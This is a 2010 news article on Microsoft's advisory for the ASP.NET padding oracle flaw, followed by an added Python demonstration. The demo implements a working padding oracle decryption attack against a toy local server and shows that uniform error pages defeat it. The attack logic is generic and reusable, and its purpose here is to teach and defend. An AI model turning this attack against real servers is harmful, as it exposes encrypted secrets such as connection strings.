Network Security News

Microsoft Releases Security Advisory For ASP.NET Vulnerability

September 19, 2010

Microsoft issued a security advisory Sept. 17 with a workaround for a vulnerability impacting Web applications built on ASP.NET.

The advisory was in response to findings by security researchers Juliano Rizzo and Thai Duong, who developed the "Padding Oracle Exploit Tool" to demonstrate the attack. At the heart of the issue is a flaw in the way ASP.NET uses encryption to protect data: Microsoft said the problem is caused by ASP.NET returning error details to Web clients that reveal why decryption of a supplied ciphertext failed.

"An oracle in the context of cryptography is a system which provides hints as you ask it questions," Brown of Microsoft Security Response Center Engineering wrote in a post on Microsoft's Security Research & Defense blog. "In this case, there is a vulnerability in ASP.Net which acts as a padding oracle. This allows an attacker to send chosen cipher text to the server and learn if it was decrypted properly by examining which error code was returned by the server."

"By making many requests the attacker can learn enough to successfully decrypt the rest of the cipher text," he continued. "The attacker can then alter the plain text and re-encrypt it as well.”

If the ASP.NET application stores sensitive information, such as passwords or database connection strings, in the ViewState object the data could be compromised, Brown blogged.

"The ViewState object is encrypted and sent to the client in a hidden form variable, so it is a possible target of this attack," he wrote. "If the ASP.Net application is using ASP.Net 3.5 SP1 or above, the attacker could use this encryption vulnerability to request the contents of an arbitrary file within the ASP.Net application."

"The public disclosure demonstrated using this technique to retrieve the contents of web.config," he added, noting that any "file in the ASP.Net application which the worker process has access to will be returned to the attacker."

Microsoft said it is planning an update to address the issue, and as of Sept. 17 was not aware of any attacks targeting the flaw. According to the advisory, switching from AES to Triple DES encryption will have no effect, since the "cryptographic vulnerability being presented involves revealing cryptographic padding errors to a client for algorithms that use PKCS #7 padding," and Triple DES uses the same padding mode as AES.

As a workaround, the company recommends enabling ASP.NET custom errors, and mapping all error codes to the same error page to make it more difficult for an attacker to distinguish the different types of errors. Advice on how to do that is contained within the advisory.
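The mechanism Brown describes above (distinct error codes turning the server into a padding oracle, and many chosen-ciphertext requests recovering the plaintext block by block) and the workaround in the paragraph just above (every error mapped to one page) are both shown in the following Python example. It is added here and is not Microsoft's code, ASP.NET's ViewState handling or the researchers' exploit tool: the block cipher is a toy Feistel construction standing in for AES or 3DES, the `VS:` prefix stands in for ViewState framing, the key, IV, secret and HTTP response strings are constructed for the demo, and `server`, `recover_block`, `decrypt_via_oracle` and `run_demo` are names chosen for this example.

```python
# Added example: CBC + PKCS#7 behind a "server" that leaks padding errors, the byte-at-a-time
# attack against it, and the same attack against a server that maps every error to one page.
import hashlib

BLOCK = 16
PADDING_ERR = "HTTP 500: Padding is invalid and cannot be removed."  # distinct response the oracle leaks
GENERIC_ERR = "HTTP 302: redirect to /error.html"                    # the single page after the workaround
DEMO_SECRET = b"VS:ConnectionString=Server=db;Password=hunter2"       # constructed; "VS:" stands in for ViewState framing

class PaddingError(ValueError):
    pass

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _feistel(key, block, rounds):  # toy 4-round Feistel cipher: not secure, which is irrelevant here
    l, r = block[:8], block[8:]
    for i in rounds:
        l, r = r, _xor(l, hashlib.sha256(key + bytes([i]) + r).digest()[:8])
    return r + l

def block_encrypt(key, block):
    return _feistel(key, block, range(4))

def block_decrypt(key, block):
    return _feistel(key, block, reversed(range(4)))

def pad(data):  # PKCS#7, the padding ASP.NET uses for both AES and 3DES
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise PaddingError
    return data[:-n]

def cbc_encrypt(key, iv, pt):
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    blocks = [iv] + [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    return b"".join(_xor(block_decrypt(key, c), p) for p, c in zip(blocks, blocks[1:]))

def server(key, blob, uniform_errors):
    """Decrypt blob (iv || ciphertext) and 'deserialize' it; uniform_errors=True applies the workaround."""
    try:
        pt = unpad(cbc_decrypt(key, blob[:BLOCK], blob[BLOCK:]))
        if not pt.startswith(b"VS:"):
            raise ValueError("not a viewstate")          # the failure that follows a successful unpad
    except ValueError as e:
        if uniform_errors:
            return GENERIC_ERR                          # padding error and parse error look identical
        return PADDING_ERR if isinstance(e, PaddingError) else "HTTP 500: Invalid viewstate."
    return "HTTP 200 OK"

def recover_block(padding_ok, prev, target):
    """Recover one plaintext block from an oracle answering whether prev||target unpads cleanly."""
    inter = bytearray(BLOCK)                  # D_k(target), learned from the last byte backwards
    for j in range(BLOCK - 1, -1, -1):
        p = BLOCK - j                         # padding value being forced: 1, 2, ..., 16
        forged = bytearray(inter[k] ^ p if k > j else 0 for k in range(BLOCK))
        hits = []
        for g in range(256):
            forged[j] = g
            if not padding_ok(bytes(forged) + target):
                continue
            if j == BLOCK - 1:                # \x02\x02 etc. also pass; disturb byte 14 to reject them
                alt = bytearray(forged)
                alt[j - 1] ^= 0xFF
                if not padding_ok(bytes(alt) + target):
                    continue
            hits.append(g)
        if len(hits) != 1:
            return None                       # 0 or 256 hits: the responses carried no information
        inter[j] = hits[0] ^ p
    return _xor(bytes(inter), prev)

def decrypt_via_oracle(send, blob):  # attacker side: sees only responses, never the key
    padding_ok = lambda b: send(b) != PADDING_ERR
    blocks = [blob[i:i + BLOCK] for i in range(0, len(blob), BLOCK)]
    out = b""
    for prev, target in zip(blocks, blocks[1:]):
        pt = recover_block(padding_ok, prev, target)
        if pt is None:
            return None
        out += pt
    return out

def run_demo():
    key, iv = b"constructed-demo-key", bytes(BLOCK)     # constructed; a fixed IV keeps the demo reproducible
    blob = iv + cbc_encrypt(key, iv, pad(DEMO_SECRET))  # what a client holds as "encrypted ViewState"
    leaked = decrypt_via_oracle(lambda b: server(key, b, uniform_errors=False), blob)
    blocked = decrypt_via_oracle(lambda b: server(key, b, uniform_errors=True), blob)
    return leaked, blocked
```

`run_demo()` returns the full padded plaintext against the leaky server, using at most 256 requests per byte and never touching the key, and `None` against the hardened one, where all 256 guesses for the first byte produce the same page and `recover_block` gives up. In ASP.NET terms the `uniform_errors=True` branch is what the advisory's customErrors setting with a single default error page achieves: the response is the same whether the padding check or the later ViewState parsing failed. One caveat a practitioner should keep in mind: this removes the explicit signal, but the two failure paths can still differ in response time, which is why Microsoft's sample error page for this advisory also added a random delay, and why the real fix is the update rather than the workaround.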
